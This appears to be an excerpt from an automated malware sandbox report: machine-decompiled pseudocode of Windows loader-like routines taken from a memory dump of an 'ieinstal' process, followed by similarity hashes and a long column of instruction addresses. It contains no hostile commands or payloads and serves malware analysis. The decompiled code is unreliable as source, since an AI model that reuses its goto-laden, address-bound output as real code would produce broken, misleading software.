                        										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                        										asm("lock cmpxchg [edi], esi");
                        										_t248 = _v56;
                        										__eflags = _t180 - _t215;
                        										if(_t180 == _t215) {
                        											break;
                        										}
                        										_t215 = _t180;
                        									}
                        									__eflags = _t248 - 2;
                        									if(_t248 == 2) {
                        										__eflags = 0;
                        										E1ED400C2(0x1edf8608, 0, _t235);
                        									}
                        									_t229 = _v72;
                        								}
                        								goto L14;
                        							}
                        						}
                        					}
                        				}
                        				_t227 = 0;
                        				_v75 = 0;
                        				if(_t128 != 0) {
                        					goto L4;
                        				}
                        				goto L2;
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a67429dc4e0a54c16b69202d308d235fed5f595fc902f3d67a15134e583d872a
                        • Instruction ID: 6dd9809843442b4ab735aa06775f54c5cc11445754fbd07ac4561a35036b2a83
                        • Opcode Fuzzy Hash: a67429dc4e0a54c16b69202d308d235fed5f595fc902f3d67a15134e583d872a
                        • Instruction Fuzzy Hash: 69F106B5E083C29FD711CF25C95074AB7E2AF85B19F648B1DE8958B280D734E841CB93
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E1ED1D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                        				signed int _v8;
                        				intOrPtr _v20;
                        				signed int _v36;
                        				intOrPtr* _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				signed char _v52;
                        				signed int _v60;
                        				signed int _v64;
                        				signed int _v68;
                        				signed int _v72;
                        				signed int _v76;
                        				intOrPtr _v80;
                        				signed int _v84;
                        				intOrPtr _v100;
                        				intOrPtr _v104;
                        				signed int _v108;
                        				signed int _v112;
                        				signed int _v116;
                        				intOrPtr _v120;
                        				signed int _v132;
                        				char _v140;
                        				char _v144;
                        				char _v157;
                        				signed int _v164;
                        				signed int _v168;
                        				signed int _v169;
                        				intOrPtr _v176;
                        				signed int _v180;
                        				signed int _v184;
                        				intOrPtr _v188;
                        				signed int _v192;
                        				signed int _v200;
                        				signed int _v208;
                        				intOrPtr* _v212;
                        				char _v216;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed int _t204;
                        				signed int _t206;
                        				void* _t208;
                        				signed int _t211;
                        				signed int _t216;
                        				intOrPtr _t217;
                        				intOrPtr* _t218;
                        				signed int _t226;
                        				signed int _t239;
                        				signed int* _t247;
                        				signed int _t249;
                        				void* _t252;
                        				signed int _t256;
                        				signed int _t269;
                        				signed int _t271;
                        				signed int _t277;
                        				signed int _t279;
                        				intOrPtr _t283;
                        				signed int _t287;
                        				signed int _t288;
                        				void* _t289;
                        				signed char _t290;
                        				signed int _t292;
                        				signed int* _t293;
                        				unsigned int _t297;
                        				signed int _t306;
                        				signed int _t307;
                        				signed int _t308;
                        				signed int _t309;
                        				signed int _t310;
                        				intOrPtr _t311;
                        				intOrPtr _t312;
                        				signed int _t319;
                        				signed int _t320;
                        				signed int* _t324;
                        				signed int _t337;
                        				signed int _t338;
                        				signed int _t339;
                        				signed int* _t340;
                        				void* _t341;
                        				signed int _t344;
                        				signed int _t348;
                        				signed int _t349;
                        				signed int _t351;
                        				intOrPtr _t353;
                        				void* _t354;
                        				signed int _t356;
                        				signed int _t358;
                        				intOrPtr _t359;
                        				signed int _t361;
                        				signed int _t363;
                        				signed short* _t365;
                        				void* _t367;
                        				intOrPtr _t369;
                        				void* _t370;
                        				signed int _t371;
                        				signed int _t372;
                        				void* _t374;
                        				signed int _t376;
                        				void* _t384;
                        				signed int _t387;
                        
                        				_v8 =  *0x1edfd360 ^ _t376;
                        				_t2 =  &_a20;
                        				 *_t2 = _a20 & 0x00000001;
                        				_t287 = _a4;
                        				_v200 = _a12;
                        				_t365 = _a8;
                        				_v212 = _a16;
                        				_v180 = _a24;
                        				_v168 = 0;
                        				_v157 = 0;
                        				if( *_t2 != 0) {
                        					__eflags = E1ED16600(0x1edf52d8);
                        					if(__eflags == 0) {
                        						goto L1;
                        					} else {
                        						_v188 = 6;
                        					}
                        				} else {
                        					L1:
                        					_v188 = 9;
                        				}
                        				if(_t365 == 0) {
                        					_v164 = 0;
                        					goto L5;
                        				} else {
                        					_t363 =  *_t365 & 0x0000ffff;
                        					_t341 = _t363 + 1;
                        					if((_t365[1] & 0x0000ffff) < _t341) {
                        						L109:
                        						__eflags = _t341 - 0x80;
                        						if(_t341 <= 0x80) {
                        							_t281 =  &_v140;
                        							_v164 =  &_v140;
                        							goto L114;
                        						} else {
                        							_t283 =  *0x1edf7b9c; // 0x0
                        							_t281 = L1ED24620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                        							_v164 = _t281;
                        							__eflags = _t281;
                        							if(_t281 != 0) {
                        								_v157 = 1;
                        								L114:
                        								E1ED4F3E0(_t281, _t365[2], _t363);
                        								_t200 = _v164;
                        								 *((char*)(_v164 + _t363)) = 0;
                        								goto L5;
                        							} else {
                        								_t204 = 0xc000009a;
                        								goto L47;
                        							}
                        						}
                        					} else {
                        						_t200 = _t365[2];
                        						_v164 = _t200;
                        						if( *((char*)(_t200 + _t363)) != 0) {
                        							goto L109;
                        						} else {
                        							while(1) {
                        								L5:
                        								_t353 = 0;
                        								_t342 = 0x1000;
                        								_v176 = 0;
                        								if(_t287 == 0) {
                        									break;
                        								}
                        								_t384 = _t287 -  *0x1edf7b90; // 0x77df0000
                        								if(_t384 == 0) {
                        									_t353 =  *0x1edf7b8c; // 0x2fb2c08
                        									_v176 = _t353;
                        									_t320 = ( *(_t353 + 0x50))[8];
                        									_v184 = _t320;
                        								} else {
                        									E1ED22280(_t200, 0x1edf84d8);
                        									_t277 =  *0x1edf85f4;
                        									_t351 =  *0x1edf85f8 & 1;
                        									while(_t277 != 0) {
                        										_t337 =  *(_t277 - 0x50);
                        										if(_t337 > _t287) {
                        											_t338 = _t337 | 0xffffffff;
                        										} else {
                        											asm("sbb ecx, ecx");
                        											_t338 =  ~_t337;
                        										}
                        										_t387 = _t338;
                        										if(_t387 < 0) {
                        											_t339 =  *_t277;
                        											__eflags = _t351;
                        											if(_t351 != 0) {
                        												__eflags = _t339;
                        												if(_t339 == 0) {
                        													goto L16;
                        												} else {
                        													goto L118;
                        												}
                        												goto L151;
                        											} else {
                        												goto L16;
                        											}
                        											goto L17;
                        										} else {
                        											if(_t387 <= 0) {
                        												__eflags = _t277;
                        												if(_t277 != 0) {
                        													_t340 =  *(_t277 - 0x18);
                        													_t24 = _t277 - 0x68; // 0x2fb3c68
                        													_t353 = _t24;
                        													_v176 = _t353;
                        													__eflags = _t340[3] - 0xffffffff;
                        													if(_t340[3] != 0xffffffff) {
                        														_t279 =  *_t340;
                        														__eflags =  *(_t279 - 0x20) & 0x00000020;
                        														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                        															asm("lock inc dword [edi+0x9c]");
                        															_t340 =  *(_t353 + 0x50);
                        														}
                        													}
                        													_v184 = _t340[8];
                        												}
                        											} else {
                        												_t339 =  *(_t277 + 4);
                        												if(_t351 != 0) {
                        													__eflags = _t339;
                        													if(_t339 == 0) {
                        														goto L16;
                        													} else {
                        														L118:
                        														_t277 = _t277 ^ _t339;
                        														goto L17;
                        													}
                        													goto L151;
                        												} else {
                        													L16:
                        													_t277 = _t339;
                        												}
                        												goto L17;
                        											}
                        										}
                        										goto L25;
                        										L17:
                        									}
                        									L25:
                        									E1ED1FFB0(_t287, _t353, 0x1edf84d8);
                        									_t320 = _v184;
                        									_t342 = 0x1000;
                        								}
                        								if(_t353 == 0) {
                        									break;
                        								} else {
                        									_t366 = 0;
                        									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                        										_t288 = _v164;
                        										if(_t353 != 0) {
                        											_t342 = _t288;
                        											_t374 = E1ED5CC99(_t353, _t288, _v200, 1,  &_v168);
                        											if(_t374 >= 0) {
                        												if(_v184 == 7) {
                        													__eflags = _a20;
                        													if(__eflags == 0) {
                        														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                        														if(__eflags != 0) {
                        															_t271 = E1ED16600(0x1edf52d8);
                        															__eflags = _t271;
                        															if(__eflags == 0) {
                        																_t342 = 0;
                        																_v169 = _t271;
                        																_t374 = E1ED17926( *(_t353 + 0x50), 0,  &_v169);
                        															}
                        														}
                        													}
                        												}
                        												if(_t374 < 0) {
                        													_v168 = 0;
                        												} else {
                        													if( *0x1edfb239 != 0) {
                        														_t342 =  *(_t353 + 0x18);
                        														E1ED8E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                        													}
                        													if( *0x1edf8472 != 0) {
                        														_v192 = 0;
                        														_t342 =  *0x7ffe0330;
                        														_t361 =  *0x1edfb218; // 0x0
                        														asm("ror edi, cl");
                        														 *0x1edfb1e0( &_v192, _t353, _v168, 0, _v180);
                        														 *(_t361 ^  *0x7ffe0330)();
                        														_t269 = _v192;
                        														_t353 = _v176;
                        														__eflags = _t269;
                        														if(__eflags != 0) {
                        															_v168 = _t269;
                        														}
                        													}
                        												}
                        											}
                        											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                        												_t366 = 0xc000007a;
                        											}
                        											_t247 =  *(_t353 + 0x50);
                        											if(_t247[3] == 0xffffffff) {
                        												L40:
                        												if(_t366 == 0xc000007a) {
                        													__eflags = _t288;
                        													if(_t288 == 0) {
                        														goto L136;
                        													} else {
                        														_t366 = 0xc0000139;
                        													}
                        													goto L54;
                        												}
                        											} else {
                        												_t249 =  *_t247;
                        												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                        													goto L40;
                        												} else {
                        													_t250 = _t249 | 0xffffffff;
                        													asm("lock xadd [edi+0x9c], eax");
                        													if((_t249 | 0xffffffff) == 0) {
                        														E1ED22280(_t250, 0x1edf84d8);
                        														_t342 =  *(_t353 + 0x54);
                        														_t165 = _t353 + 0x54; // 0x54
                        														_t252 = _t165;
                        														__eflags =  *(_t342 + 4) - _t252;
                        														if( *(_t342 + 4) != _t252) {
                        															L135:
                        															asm("int 0x29");
                        															L136:
                        															_t288 = _v200;
                        															_t366 = 0xc0000138;
                        															L54:
                        															_t342 = _t288;
                        															L1ED43898(0, _t288, _t366);
                        														} else {
                        															_t324 =  *(_t252 + 4);
                        															__eflags =  *_t324 - _t252;
                        															if( *_t324 != _t252) {
                        																goto L135;
                        															} else {
                        																 *_t324 = _t342;
                        																 *(_t342 + 4) = _t324;
                        																_t293 =  *(_t353 + 0x50);
                        																_v180 =  *_t293;
                        																E1ED1FFB0(_t293, _t353, 0x1edf84d8);
                        																__eflags =  *((short*)(_t353 + 0x3a));
                        																if( *((short*)(_t353 + 0x3a)) != 0) {
                        																	_t342 = 0;
                        																	__eflags = 0;
                        																	E1ED437F5(_t353, 0);
                        																}
                        																E1ED40413(_t353);
                        																_t256 =  *(_t353 + 0x48);
                        																__eflags = _t256;
                        																if(_t256 != 0) {
                        																	__eflags = _t256 - 0xffffffff;
                        																	if(_t256 != 0xffffffff) {
                        																		E1ED39B10(_t256);
                        																	}
                        																}
                        																__eflags =  *(_t353 + 0x28);
                        																if( *(_t353 + 0x28) != 0) {
                        																	_t174 = _t353 + 0x24; // 0x24
                        																	E1ED302D6(_t174);
                        																}
                        																L1ED277F0( *0x1edf7b98, 0, _t353);
                        																__eflags = _v180 - _t293;
                        																if(__eflags == 0) {
                        																	E1ED3C277(_t293, _t366);
                        																}
                        																_t288 = _v164;
                        																goto L40;
                        															}
                        														}
                        													} else {
                        														goto L40;
                        													}
                        												}
                        											}
                        										}
                        									} else {
                        										L1ED1EC7F(_t353);
                        										L1ED319B8(_t287, 0, _t353, 0);
                        										_t200 = E1ED0F4E3(__eflags);
                        										continue;
                        									}
                        								}
                        								L41:
                        								if(_v157 != 0) {
                        									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                        								}
                        								if(_t366 < 0) {
                        									L46:
                        									 *_v212 = _v168;
                        									_t204 = _t366;
                        									L47:
                        									_pop(_t354);
                        									_pop(_t367);
                        									_pop(_t289);
                        									return E1ED4B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                        								} else {
                        									_t206 =  *0x1edfb2f8; // 0xa00000
                        									if((_t206 |  *0x1edfb2fc) == 0 || ( *0x1edfb2e4 & 0x00000001) != 0) {
                        										goto L46;
                        									} else {
                        										_t297 =  *0x1edfb2ec; // 0x100
                        										_v200 = 0;
                        										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                        											_t355 = _v168;
                        											_t342 =  &_v208;
                        											_t208 = E1EDB6B68(_v168,  &_v208, _v168, __eflags);
                        											__eflags = _t208 - 1;
                        											if(_t208 == 1) {
                        												goto L46;
                        											} else {
                        												__eflags = _v208 & 0x00000010;
                        												if((_v208 & 0x00000010) == 0) {
                        													goto L46;
                        												} else {
                        													_t342 = 4;
                        													_t366 = E1EDB6AEB(_t355, 4,  &_v216);
                        													__eflags = _t366;
                        													if(_t366 >= 0) {
                        														goto L46;
                        													} else {
                        														asm("int 0x29");
                        														_t356 = 0;
                        														_v44 = 0;
                        														_t290 = _v52;
                        														__eflags = 0;
                        														if(0 == 0) {
                        															L108:
                        															_t356 = 0;
                        															_v44 = 0;
                        															goto L63;
                        														} else {
                        															__eflags = 0;
                        															if(0 < 0) {
                        																goto L108;
                        															}
                        															L63:
                        															_v112 = _t356;
                        															__eflags = _t356;
                        															if(_t356 == 0) {
                        																L143:
                        																_v8 = 0xfffffffe;
                        																_t211 = 0xc0000089;
                        															} else {
                        																_v36 = 0;
                        																_v60 = 0;
                        																_v48 = 0;
                        																_v68 = 0;
                        																_v44 = _t290 & 0xfffffffc;
                        																E1ED1E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                        																_t306 = _v68;
                        																__eflags = _t306;
                        																if(_t306 == 0) {
                        																	_t216 = 0xc000007b;
                        																	_v36 = 0xc000007b;
                        																	_t307 = _v60;
                        																} else {
                        																	__eflags = _t290 & 0x00000001;
                        																	if(__eflags == 0) {
                        																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                        																		__eflags = _t349 - 0x10b;
                        																		if(_t349 != 0x10b) {
                        																			__eflags = _t349 - 0x20b;
                        																			if(_t349 == 0x20b) {
                        																				goto L102;
                        																			} else {
                        																				_t307 = 0;
                        																				_v48 = 0;
                        																				_t216 = 0xc000007b;
                        																				_v36 = 0xc000007b;
                        																				goto L71;
                        																			}
                        																		} else {
                        																			L102:
                        																			_t307 =  *(_t306 + 0x50);
                        																			goto L69;
                        																		}
                        																		goto L151;
                        																	} else {
                        																		_t239 = L1ED1EAEA(_t290, _t290, _t356, _t366, __eflags);
                        																		_t307 = _t239;
                        																		_v60 = _t307;
                        																		_v48 = _t307;
                        																		__eflags = _t307;
                        																		if(_t307 != 0) {
                        																			L70:
                        																			_t216 = _v36;
                        																		} else {
                        																			_push(_t239);
                        																			_push(0x14);
                        																			_push( &_v144);
                        																			_push(3);
                        																			_push(_v44);
                        																			_push(0xffffffff);
                        																			_t319 = E1ED49730();
                        																			_v36 = _t319;
                        																			__eflags = _t319;
                        																			if(_t319 < 0) {
                        																				_t216 = 0xc000001f;
                        																				_v36 = 0xc000001f;
                        																				_t307 = _v60;
                        																			} else {
                        																				_t307 = _v132;
                        																				L69:
                        																				_v48 = _t307;
                        																				goto L70;
                        																			}
                        																		}
                        																	}
                        																}
                        																L71:
                        																_v72 = _t307;
                        																_v84 = _t216;
                        																__eflags = _t216 - 0xc000007b;
                        																if(_t216 == 0xc000007b) {
                        																	L150:
                        																	_v8 = 0xfffffffe;
                        																	_t211 = 0xc000007b;
                        																} else {
                        																	_t344 = _t290 & 0xfffffffc;
                        																	_v76 = _t344;
                        																	__eflags = _v40 - _t344;
                        																	if(_v40 <= _t344) {
                        																		goto L150;
                        																	} else {
                        																		__eflags = _t307;
                        																		if(_t307 == 0) {
                        																			L75:
                        																			_t217 = 0;
                        																			_v104 = 0;
                        																			__eflags = _t366;
                        																			if(_t366 != 0) {
                        																				__eflags = _t290 & 0x00000001;
                        																				if((_t290 & 0x00000001) != 0) {
                        																					_t217 = 1;
                        																					_v104 = 1;
                        																				}
                        																				_t290 = _v44;
                        																				_v52 = _t290;
                        																			}
                        																			__eflags = _t217 - 1;
                        																			if(_t217 != 1) {
                        																				_t369 = 0;
                        																				_t218 = _v40;
                        																				goto L91;
                        																			} else {
                        																				_v64 = 0;
                        																				E1ED1E9C0(1, _t290, 0, 0,  &_v64);
                        																				_t309 = _v64;
                        																				_v108 = _t309;
                        																				__eflags = _t309;
                        																				if(_t309 == 0) {
                        																					goto L143;
                        																				} else {
                        																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                        																					__eflags = _t226 - 0x10b;
                        																					if(_t226 != 0x10b) {
                        																						__eflags = _t226 - 0x20b;
                        																						if(_t226 != 0x20b) {
                        																							goto L143;
                        																						} else {
                        																							_t371 =  *(_t309 + 0x98);
                        																							goto L83;
                        																						}
                        																					} else {
                        																						_t371 =  *(_t309 + 0x88);
                        																						L83:
                        																						__eflags = _t371;
                        																						if(_t371 != 0) {
                        																							_v80 = _t371 - _t356 + _t290;
                        																							_t310 = _v64;
                        																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                        																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                        																							_t311 = 0;
                        																							__eflags = 0;
                        																							while(1) {
                        																								_v120 = _t311;
                        																								_v116 = _t348;
                        																								__eflags = _t311 - _t292;
                        																								if(_t311 >= _t292) {
                        																									goto L143;
                        																								}
                        																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                        																								__eflags = _t371 - _t359;
                        																								if(_t371 < _t359) {
                        																									L98:
                        																									_t348 = _t348 + 0x28;
                        																									_t311 = _t311 + 1;
                        																									continue;
                        																								} else {
                        																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                        																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                        																										goto L98;
                        																									} else {
                        																										__eflags = _t348;
                        																										if(_t348 == 0) {
                        																											goto L143;
                        																										} else {
                        																											_t218 = _v40;
                        																											_t312 =  *_t218;
                        																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                        																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                        																												_v100 = _t359;
                        																												_t360 = _v108;
                        																												_t372 = L1ED18F44(_v108, _t312);
                        																												__eflags = _t372;
                        																												if(_t372 == 0) {
                        																													goto L143;
                        																												} else {
                        																													_t290 = _v52;
                        																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E1ED43C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                        																													_t307 = _v72;
                        																													_t344 = _v76;
                        																													_t218 = _v40;
                        																													goto L91;
                        																												}
                        																											} else {
                        																												_t290 = _v52;
                        																												_t307 = _v72;
                        																												_t344 = _v76;
                        																												_t369 = _v80;
                        																												L91:
                        																												_t358 = _a4;
                        																												__eflags = _t358;
                        																												if(_t358 == 0) {
                        																													L95:
                        																													_t308 = _a8;
                        																													__eflags = _t308;
                        																													if(_t308 != 0) {
                        																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                        																													}
                        																													_v8 = 0xfffffffe;
                        																													_t211 = _v84;
                        																												} else {
                        																													_t370 =  *_t218 - _t369 + _t290;
                        																													 *_t358 = _t370;
                        																													__eflags = _t370 - _t344;
                        																													if(_t370 <= _t344) {
                        																														L149:
                        																														 *_t358 = 0;
                        																														goto L150;
                        																													} else {
                        																														__eflags = _t307;
                        																														if(_t307 == 0) {
                        																															goto L95;
                        																														} else {
                        																															__eflags = _t370 - _t344 + _t307;
                        																															if(_t370 >= _t344 + _t307) {
                        																																goto L149;
                        																															} else {
                        																																goto L95;
                        																															}
                        																														}
                        																													}
                        																												}
                        																											}
                        																										}
                        																									}
                        																								}
                        																								goto L97;
                        																							}
                        																						}
                        																						goto L143;
                        																					}
                        																				}
                        																			}
                        																		} else {
                        																			__eflags = _v40 - _t307 + _t344;
                        																			if(_v40 >= _t307 + _t344) {
                        																				goto L150;
                        																			} else {
                        																				goto L75;
                        																			}
                        																		}
                        																	}
                        																}
                        															}
                        															L97:
                        															 *[fs:0x0] = _v20;
                        															return _t211;
                        														}
                        													}
                        												}
                        											}
                        										} else {
                        											goto L46;
                        										}
                        									}
                        								}
                        								goto L151;
                        							}
                        							_t288 = _v164;
                        							_t366 = 0xc0000135;
                        							goto L41;
                        						}
                        					}
                        				}
                        				L151:
                        			}

                        0x1ed1d6fd
                        0x1ed1d701
                        0x1ed1d703
                        0x1ed1d70a
                        0x1ed1d70a
                        0x1ed1d701
                        0x1ed1d710
                        0x1ed1d710
                        0x1ed1d6c1
                        0x1ed1d6c1
                        0x1ed1d6c6
                        0x1ed6b36d
                        0x1ed6b36f
                        0x00000000
                        0x1ed6b375
                        0x1ed6b375
                        0x1ed6b375
                        0x00000000
                        0x1ed6b375
                        0x00000000
                        0x1ed1d6cc
                        0x1ed1d6d8
                        0x1ed1d6d8
                        0x1ed1d6d8
                        0x00000000
                        0x1ed1d6c6
                        0x1ed1d6bf
                        0x00000000
                        0x1ed1d6da
                        0x1ed1d6da
                        0x1ed1d716
                        0x1ed1d71b
                        0x1ed1d720
                        0x1ed1d726
                        0x1ed1d726
                        0x1ed1d72d
                        0x00000000
                        0x1ed1d733
                        0x1ed1d739
                        0x1ed1d742
                        0x1ed1d750
                        0x1ed1d758
                        0x1ed1d764
                        0x1ed1d776
                        0x1ed1d77a
                        0x1ed1d783
                        0x1ed1d928
                        0x1ed1d92c
                        0x1ed1d93d
                        0x1ed1d944
                        0x1ed1d94f
                        0x1ed1d954
                        0x1ed1d956
                        0x1ed1d95f
                        0x1ed1d961
                        0x1ed1d973
                        0x1ed1d973
                        0x1ed1d956
                        0x1ed1d944
                        0x1ed1d92c
                        0x1ed1d78b
                        0x1ed6b394
                        0x1ed1d791
                        0x1ed1d798
                        0x1ed6b3a3
                        0x1ed6b3bb
                        0x1ed6b3bb
                        0x1ed1d7a5
                        0x1ed1d866
                        0x1ed1d870
                        0x1ed1d884
                        0x1ed1d892
                        0x1ed1d898
                        0x1ed1d89e
                        0x1ed1d8a0
                        0x1ed1d8a6
                        0x1ed1d8ac
                        0x1ed1d8ae
                        0x1ed1d8b4
                        0x1ed1d8b4
                        0x1ed1d8ae
                        0x1ed1d7a5
                        0x1ed1d78b
                        0x1ed1d7b1
                        0x1ed6b3c5
                        0x1ed6b3c5
                        0x1ed1d7c3
                        0x1ed1d7ca
                        0x1ed1d7e5
                        0x1ed1d7eb
                        0x1ed1d8eb
                        0x1ed1d8ed
                        0x00000000
                        0x1ed1d8f3
                        0x1ed1d8f3
                        0x1ed1d8f3
                        0x00000000
                        0x1ed1d8ed
                        0x1ed1d7cc
                        0x1ed1d7cc
                        0x1ed1d7d2
                        0x00000000
                        0x1ed1d7d4
                        0x1ed1d7d4
                        0x1ed1d7d7
                        0x1ed1d7df
                        0x1ed6b3d4
                        0x1ed6b3d9
                        0x1ed6b3dc
                        0x1ed6b3dc
                        0x1ed6b3df
                        0x1ed6b3e2
                        0x1ed6b468
                        0x1ed6b46d
                        0x1ed6b46f
                        0x1ed6b46f
                        0x1ed6b475
                        0x1ed1d8f8
                        0x1ed1d8f9
                        0x1ed1d8fd
                        0x1ed6b3e8
                        0x1ed6b3e8
                        0x1ed6b3eb
                        0x1ed6b3ed
                        0x00000000
                        0x1ed6b3ef
                        0x1ed6b3ef
                        0x1ed6b3f1
                        0x1ed6b3f4
                        0x1ed6b3fe
                        0x1ed6b404
                        0x1ed6b409
                        0x1ed6b40e
                        0x1ed6b410
                        0x1ed6b410
                        0x1ed6b414
                        0x1ed6b414
                        0x1ed6b41b
                        0x1ed6b420
                        0x1ed6b423
                        0x1ed6b425
                        0x1ed6b427
                        0x1ed6b42a
                        0x1ed6b42d
                        0x1ed6b42d
                        0x1ed6b42a
                        0x1ed6b432
                        0x1ed6b436
                        0x1ed6b438
                        0x1ed6b43b
                        0x1ed6b43b
                        0x1ed6b449
                        0x1ed6b44e
                        0x1ed6b454
                        0x1ed6b458
                        0x1ed6b458
                        0x1ed6b45d
                        0x00000000
                        0x1ed6b45d
                        0x1ed6b3ed
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed1d7df
                        0x1ed1d7d2
                        0x1ed1d7ca
                        0x1ed6b37c
                        0x1ed6b37e
                        0x1ed6b385
                        0x1ed6b38a
                        0x00000000
                        0x1ed6b38a
                        0x1ed1d742
                        0x1ed1d7f1
                        0x1ed1d7f8
                        0x1ed6b49b
                        0x1ed6b49b
                        0x1ed1d800
                        0x1ed1d837
                        0x1ed1d843
                        0x1ed1d845
                        0x1ed1d847
                        0x1ed1d84a
                        0x1ed1d84b
                        0x1ed1d84e
                        0x1ed1d857
                        0x1ed1d802
                        0x1ed1d802
                        0x1ed1d80d
                        0x00000000
                        0x1ed1d818
                        0x1ed1d818
                        0x1ed1d824
                        0x1ed1d831
                        0x1ed6b4a5
                        0x1ed6b4ab
                        0x1ed6b4b3
                        0x1ed6b4b8
                        0x1ed6b4bb
                        0x00000000
                        0x1ed6b4c1
                        0x1ed6b4c1
                        0x1ed6b4c8
                        0x00000000
                        0x1ed6b4ce
                        0x1ed6b4d4
                        0x1ed6b4e1
                        0x1ed6b4e3
                        0x1ed6b4e5
                        0x00000000
                        0x1ed6b4eb
                        0x1ed6b4f0
                        0x1ed6b4f2
                        0x1ed1dac9
                        0x1ed1dacc
                        0x1ed1dacf
                        0x1ed1dad1
                        0x1ed1dd78
                        0x1ed1dd78
                        0x1ed1dcf2
                        0x00000000
                        0x1ed1dad7
                        0x1ed1dad9
                        0x1ed1dadb
                        0x00000000
                        0x00000000
                        0x1ed1dae1
                        0x1ed1dae1
                        0x1ed1dae4
                        0x1ed1dae6
                        0x1ed6b4f9
                        0x1ed6b4f9
                        0x1ed6b500
                        0x1ed1daec
                        0x1ed1daec
                        0x1ed1daf5
                        0x1ed1daf8
                        0x1ed1dafb
                        0x1ed1db03
                        0x1ed1db11
                        0x1ed1db16
                        0x1ed1db19
                        0x1ed1db1b
                        0x1ed6b52c
                        0x1ed6b531
                        0x1ed6b534
                        0x1ed1db21
                        0x1ed1db21
                        0x1ed1db24
                        0x1ed1dcd9
                        0x1ed1dce2
                        0x1ed1dce5
                        0x1ed1dd6a
                        0x1ed1dd6d
                        0x00000000
                        0x1ed1dd73
                        0x1ed6b51a
                        0x1ed6b51c
                        0x1ed6b51f
                        0x1ed6b524
                        0x00000000
                        0x1ed6b524
                        0x1ed1dce7
                        0x1ed1dce7
                        0x1ed1dce7
                        0x00000000
                        0x1ed1dce7
                        0x00000000
                        0x1ed1db2a
                        0x1ed1db2c
                        0x1ed1db31
                        0x1ed1db33
                        0x1ed1db36
                        0x1ed1db39
                        0x1ed1db3b
                        0x1ed1db66
                        0x1ed1db66
                        0x1ed1db3d
                        0x1ed1db3d
                        0x1ed1db3e
                        0x1ed1db46
                        0x1ed1db47
                        0x1ed1db49
                        0x1ed1db4c
                        0x1ed1db53
                        0x1ed1db55
                        0x1ed1db58
                        0x1ed1db5a
                        0x1ed6b50a
                        0x1ed6b50f
                        0x1ed6b512
                        0x1ed1db60
                        0x1ed1db60
                        0x1ed1db63
                        0x1ed1db63
                        0x00000000
                        0x1ed1db63
                        0x1ed1db5a
                        0x1ed1db3b
                        0x1ed1db24
                        0x1ed1db69
                        0x1ed1db69
                        0x1ed1db6c
                        0x1ed1db6f
                        0x1ed1db74
                        0x1ed6b557
                        0x1ed6b557
                        0x1ed6b55e
                        0x1ed1db7a
                        0x1ed1db7c
                        0x1ed1db7f
                        0x1ed1db82
                        0x1ed1db85
                        0x00000000
                        0x1ed1db8b
                        0x1ed1db8b
                        0x1ed1db8d
                        0x1ed1db9b
                        0x1ed1db9b
                        0x1ed1db9d
                        0x1ed1dba0
                        0x1ed1dba2
                        0x1ed1dba4
                        0x1ed1dba7
                        0x1ed1dba9
                        0x1ed1dbae
                        0x1ed1dbae
                        0x1ed1dbb1
                        0x1ed1dbb4
                        0x1ed1dbb4
                        0x1ed1dbb7
                        0x1ed1dbba
                        0x1ed1dcd2
                        0x1ed1dcd4
                        0x00000000
                        0x1ed1dbc0
                        0x1ed1dbc0
                        0x1ed1dbd2
                        0x1ed1dbd7
                        0x1ed1dbda
                        0x1ed1dbdd
                        0x1ed1dbdf
                        0x00000000
                        0x1ed1dbe5
                        0x1ed1dbe5
                        0x1ed1dbee
                        0x1ed1dbf1
                        0x1ed6b541
                        0x1ed6b544
                        0x00000000
                        0x1ed6b546
                        0x1ed6b546
                        0x00000000
                        0x1ed6b546
                        0x1ed1dbf7
                        0x1ed1dbf7
                        0x1ed1dbfd
                        0x1ed1dbfd
                        0x1ed1dbff
                        0x1ed1dc0b
                        0x1ed1dc15
                        0x1ed1dc1b
                        0x1ed1dc1d
                        0x1ed1dc21
                        0x1ed1dc21
                        0x1ed1dc23
                        0x1ed1dc23
                        0x1ed1dc26
                        0x1ed1dc29
                        0x1ed1dc2b
                        0x00000000
                        0x00000000
                        0x1ed1dc31
                        0x1ed1dc34
                        0x1ed1dc36
                        0x1ed1dcbf
